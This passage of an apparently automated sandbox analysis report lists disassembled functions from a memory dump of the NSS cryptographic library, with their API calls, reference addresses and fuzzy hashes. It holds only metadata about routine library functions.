                                                                • Part of subcall function 6D130BE0: TlsGetValue.KERNEL32(6D128D2D,?,00000000,?), ref: 6D130C15
                                                              • memcpy.VCRUNTIME140(?,?,6D149767,00000000,00000000,6D147FFA,?,6D149767,?,8B7874C0,0000A48E), ref: 6D15EE33
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                              • String ID:
                                                              • API String ID: 3903481028-0
                                                              • Opcode ID: 2c1ac9e601aba94b4a5ee489b87320ced3399b5f6adc3149325c27bc4065ebb1
                                                              • Instruction ID: 6d8c57c1223dc691547963edbcfec3f7eb9e48542c5653129d031420850b8984
                                                              • Opcode Fuzzy Hash: 2c1ac9e601aba94b4a5ee489b87320ced3399b5f6adc3149325c27bc4065ebb1
                                                              • Instruction Fuzzy Hash: D1119EF1E54716ABEB109E65DC84B16B3A8EB14358F114431EE29C6204E3B9EA70C7A1
                                                              Function 6D0F8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalEnterErrorSectionUnlockValue
                                                              • String ID:
                                                              • API String ID: 284873373-0
                                                              • Opcode ID: 5c4d84c26a3e833be434c69fdbefd13ff0b02810f6d11f508e851a638e9c030d
                                                              • Instruction ID: a3ec7a7f3f4708f6ff9d16ceed081e7eb12c51b201cb0a4e57ae9b59a240da53
                                                              • Opcode Fuzzy Hash: 5c4d84c26a3e833be434c69fdbefd13ff0b02810f6d11f508e851a638e9c030d
                                                              • Instruction Fuzzy Hash: 8E118FB5908A059BD700AF78D44826ABBF4FF45718F064969ED88D7300E730E891CBD2
                                                              Function 6D17AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6D165F17,?,?,?,?,?,?,?,?,6D16AAD4), ref: 6D17AC94
                                                              • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6D165F17,?,?,?,?,?,?,?,?,6D16AAD4), ref: 6D17ACA6
                                                              • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6D16AAD4), ref: 6D17ACC0
                                                              • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6D16AAD4), ref: 6D17ACDB
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: free$DestroyFreeK11_Monitor
                                                              • String ID:
                                                              • API String ID: 3989322779-0
                                                              • Opcode ID: a5be9e2d893132b964cdb68bd1abaefb292612ab150790b285f87b60489ba8ff
                                                              • Instruction ID: 956513e72c21c708176a31c34f609eeb83755625c02235cba1ffe859dec2216e
                                                              • Opcode Fuzzy Hash: a5be9e2d893132b964cdb68bd1abaefb292612ab150790b285f87b60489ba8ff
                                                              • Instruction Fuzzy Hash: B70171B1600B02ABEB60DF39E909B17B7E8BF14665B004839E85EC3A14E771F055CBD1
                                                              Function 6D0E1DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6D0E1DFB
                                                                • Part of subcall function 6D0D95B0: TlsGetValue.KERNEL32(00000000,?,6D0F00D2,00000000), ref: 6D0D95D2
                                                                • Part of subcall function 6D0D95B0: EnterCriticalSection.KERNEL32(?,?,?,6D0F00D2,00000000), ref: 6D0D95E7
                                                                • Part of subcall function 6D0D95B0: PR_Unlock.NSS3(?,?,?,?,6D0F00D2,00000000), ref: 6D0D9605
                                                              • PR_EnterMonitor.NSS3 ref: 6D0E1E09
                                                                • Part of subcall function 6D199090: TlsGetValue.KERNEL32 ref: 6D1990AB
                                                                • Part of subcall function 6D199090: TlsGetValue.KERNEL32 ref: 6D1990C9
                                                                • Part of subcall function 6D199090: EnterCriticalSection.KERNEL32 ref: 6D1990E5
                                                                • Part of subcall function 6D199090: TlsGetValue.KERNEL32 ref: 6D199116
                                                                • Part of subcall function 6D199090: LeaveCriticalSection.KERNEL32 ref: 6D19913F
                                                                • Part of subcall function 6D0DE190: PR_EnterMonitor.NSS3(?,?,6D0DE175), ref: 6D0DE19C
                                                                • Part of subcall function 6D0DE190: PR_EnterMonitor.NSS3(6D0DE175), ref: 6D0DE1AA
                                                                • Part of subcall function 6D0DE190: PR_ExitMonitor.NSS3 ref: 6D0DE208
                                                                • Part of subcall function 6D0DE190: PL_HashTableRemove.NSS3(?), ref: 6D0DE219
                                                                • Part of subcall function 6D0DE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D0DE231
                                                                • Part of subcall function 6D0DE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D0DE249
                                                                • Part of subcall function 6D0DE190: PR_ExitMonitor.NSS3 ref: 6D0DE257
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0E1E37
                                                              • PR_ExitMonitor.NSS3 ref: 6D0E1E4A
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                              • String ID:
                                                              • API String ID: 499896158-0
                                                              • Opcode ID: e94eb23f30f0cc29481b410425d20c40f0682a16ecf428d2439a4b26e2e5398a
                                                              • Instruction ID: 271bf2a1b6ec6eb6a07dec5412faa1e5ab8674d2f84b7da3eb069a2bf47157ac
                                                              • Opcode Fuzzy Hash: e94eb23f30f0cc29481b410425d20c40f0682a16ecf428d2439a4b26e2e5398a
                                                              • Instruction Fuzzy Hash: 57018475A042119FFB204B6AEC04F2777A5BB41B8CF064031F9289B351E771E810CBD2
                                                              Function 6D0E1D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0E1D75
                                                              • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6D0E1D89
                                                              • PORT_ZAlloc_Util.NSS3(00000010), ref: 6D0E1D9C
                                                              • free.MOZGLUE(00000000), ref: 6D0E1DB8
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Alloc_Util$Errorfree
                                                              • String ID:
                                                              • API String ID: 939066016-0
                                                              • Opcode ID: 3eb1566875b7bf96bab26106d15b6e5ea92120ef30c0796a667587caa05153b2
                                                              • Instruction ID: 7a79ccc682ccde580ca5840cb09289a7c66d23136bced3084db5b2ac732742a7
                                                              • Opcode Fuzzy Hash: 3eb1566875b7bf96bab26106d15b6e5ea92120ef30c0796a667587caa05153b2
                                                              • Instruction Fuzzy Hash: F2F0F9B3E0C2155BF7211F1A6C41F5B76D8AB81BD4F064275EE5987244D760E40082E3
                                                              Function 6D17AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PK11_FreeSymKey.NSS3(?,6D165D40,00000000,?,?,6D156AC6,6D16639C), ref: 6D17AC2D
                                                                • Part of subcall function 6D11ADC0: TlsGetValue.KERNEL32(?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE10
                                                                • Part of subcall function 6D11ADC0: EnterCriticalSection.KERNEL32(?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE24
                                                                • Part of subcall function 6D11ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6D0FD079,00000000,00000001), ref: 6D11AE5A
                                                                • Part of subcall function 6D11ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE6F
                                                                • Part of subcall function 6D11ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE7F
                                                                • Part of subcall function 6D11ADC0: TlsGetValue.KERNEL32(?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AEB1
                                                                • Part of subcall function 6D11ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AEC9
                                                              • PK11_FreeSymKey.NSS3(?,6D165D40,00000000,?,?,6D156AC6,6D16639C), ref: 6D17AC44
                                                              • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6D165D40,00000000,?,?,6D156AC6,6D16639C), ref: 6D17AC59
                                                              • free.MOZGLUE(8CB6FF01,6D156AC6,6D16639C,?,?,?,?,?,?,?,?,?,6D165D40,00000000,?,6D16AAD4), ref: 6D17AC62
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                              • String ID:
                                                              • API String ID: 1595327144-0
                                                              • Opcode ID: 815a6c5283d711a8d5e8b54df369f39071b919f90de3d58273fcf59d9acb66fe
                                                              • Instruction ID: 2d8348d0b347d80bb86495d736d838f8562f6f800df43b33b5e35bd61ca918b3
                                                              • Opcode Fuzzy Hash: 815a6c5283d711a8d5e8b54df369f39071b919f90de3d58273fcf59d9acb66fe
                                                              • Instruction Fuzzy Hash: F5018BB5604600AFDF10CF14E8C0F167BA8AF54718F0880A8E94D8F30AE771E844CBA2
                                                              Function 6D12FD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6D0D9003,?), ref: 6D12FD91
                                                                • Part of subcall function 6D130BE0: malloc.MOZGLUE(6D128D2D,?,00000000,?), ref: 6D130BF8
                                                                • Part of subcall function 6D130BE0: TlsGetValue.KERNEL32(6D128D2D,?,00000000,?), ref: 6D130C15
                                                              • PORT_Alloc_Util.NSS3(A4686D13,?), ref: 6D12FDA2
                                                              • memcpy.VCRUNTIME140(00000000,12D068C3,A4686D13,?,?), ref: 6D12FDC4
                                                              • free.MOZGLUE(00000000,?,?), ref: 6D12FDD1
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                              • String ID:
                                                              • API String ID: 2335489644-0
                                                              • Opcode ID: 883f971e1aa969ab6011c807e076e90135b3c37347f9d253edc76e68ecea0ab5
                                                              • Instruction ID: bd114a8a51067ed69320398f7e9b4dd1958fd9ef98918956eff2e4bc670ea690
                                                              • Opcode Fuzzy Hash: 883f971e1aa969ab6011c807e076e90135b3c37347f9d253edc76e68ecea0ab5
                                                              • Instruction Fuzzy Hash: F8F0FCF66042175BEB004F56EC819277798EF54695F058034FD1D8B649E7B2DC50C7E1
                                                              Function 6D1ECC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalDeleteSectionfree
                                                              • String ID:
                                                              • API String ID: 2988086103-0
                                                              • Opcode ID: 20ea046db9a30fcb0c946b652bb20baa280df2279bf6d8f4f9b5e0364b70c6bb
                                                              • Instruction ID: 1b7b0f121cdf0ee280a2894ef53bdc56c07192cd8a6d6b5e0a5cf242c380dd3a
                                                              • Opcode Fuzzy Hash: 20ea046db9a30fcb0c946b652bb20baa280df2279bf6d8f4f9b5e0364b70c6bb
                                                              • Instruction Fuzzy Hash: 33E039B6600608ABCE10DFA8DC8888B77ACEE8A6743150665FA91C3700D332F915CBE1
                                                              Function 6D0C9DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • sqlite3_value_text.NSS3 ref: 6D0C9E1F
                                                                • Part of subcall function 6D0813C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6D052352,?,00000000,?,?), ref: 6D081413
                                                                • Part of subcall function 6D0813C0: memcpy.VCRUNTIME140(00000000,6D052352,00000002,?,?,?,?,6D052352,?,00000000,?,?), ref: 6D0814C0
                                                              Strings
                                                              • ESCAPE expression must be a single character, xrefs: 6D0C9F78
                                                              • LIKE or GLOB pattern too complex, xrefs: 6D0CA006
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: memcpysqlite3_value_textstrlen
                                                              • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                              • API String ID: 2453365862-264706735
                                                              • Opcode ID: daeb9925797b74c3d67c29f85a10f6a1dbffe46b8ae0d1a4ae8b5273af5b02c1
                                                              • Instruction ID: 8bc5d7cd02ed46bd4dea64535f66eceb8e8282d1f877538ea5b1fc3d138c169c
                                                              • Opcode Fuzzy Hash: daeb9925797b74c3d67c29f85a10f6a1dbffe46b8ae0d1a4ae8b5273af5b02c1
                                                              • Instruction Fuzzy Hash: 9B81E571A042568BFB00CF29D0803BEB7F2AF8531EF158659D8A88B385D736D943C792
                                                              Function 6D124D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6D124D57
                                                              • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6D124DE6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: ErrorR_snprintf
                                                              • String ID: %d.%d
                                                              • API String ID: 2298970422-3954714993
                                                              • Opcode ID: 4b4bb53be7d1240a73bc2d496f61cb909a1dfe65d4d451454fc74d80ffcbe385
                                                              • Instruction ID: f3447e0b38b016475fb0d5838e3c0f16a7475e218d6855d3c9494f24a8c0bd86
                                                              • Opcode Fuzzy Hash: 4b4bb53be7d1240a73bc2d496f61cb909a1dfe65d4d451454fc74d80ffcbe385
                                                              • Instruction Fuzzy Hash: FF314CB1D0421D6BFB109BB09C05BBF7768EF64304F050428FE059B285EBB19945CBA2
                                                              Function 6D130DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Value$calloc
                                                              • String ID:
                                                              • API String ID: 3339632435-0
                                                              • Opcode ID: fb43e7d8d4bdb3869d6e71ec82e58a828ef400ac859cf8dc4b0c9759c613c07c
                                                              • Instruction ID: f4865698fd140a862449eeb7c83267a631926685c71e7593a7dbfb0da51536a0
                                                              • Opcode Fuzzy Hash: fb43e7d8d4bdb3869d6e71ec82e58a828ef400ac859cf8dc4b0c9759c613c07c
                                                              • Instruction Fuzzy Hash: E231F6B07987258BEB115F7AD48836A77F4BF46388F03467DD89887214DBB48084CB82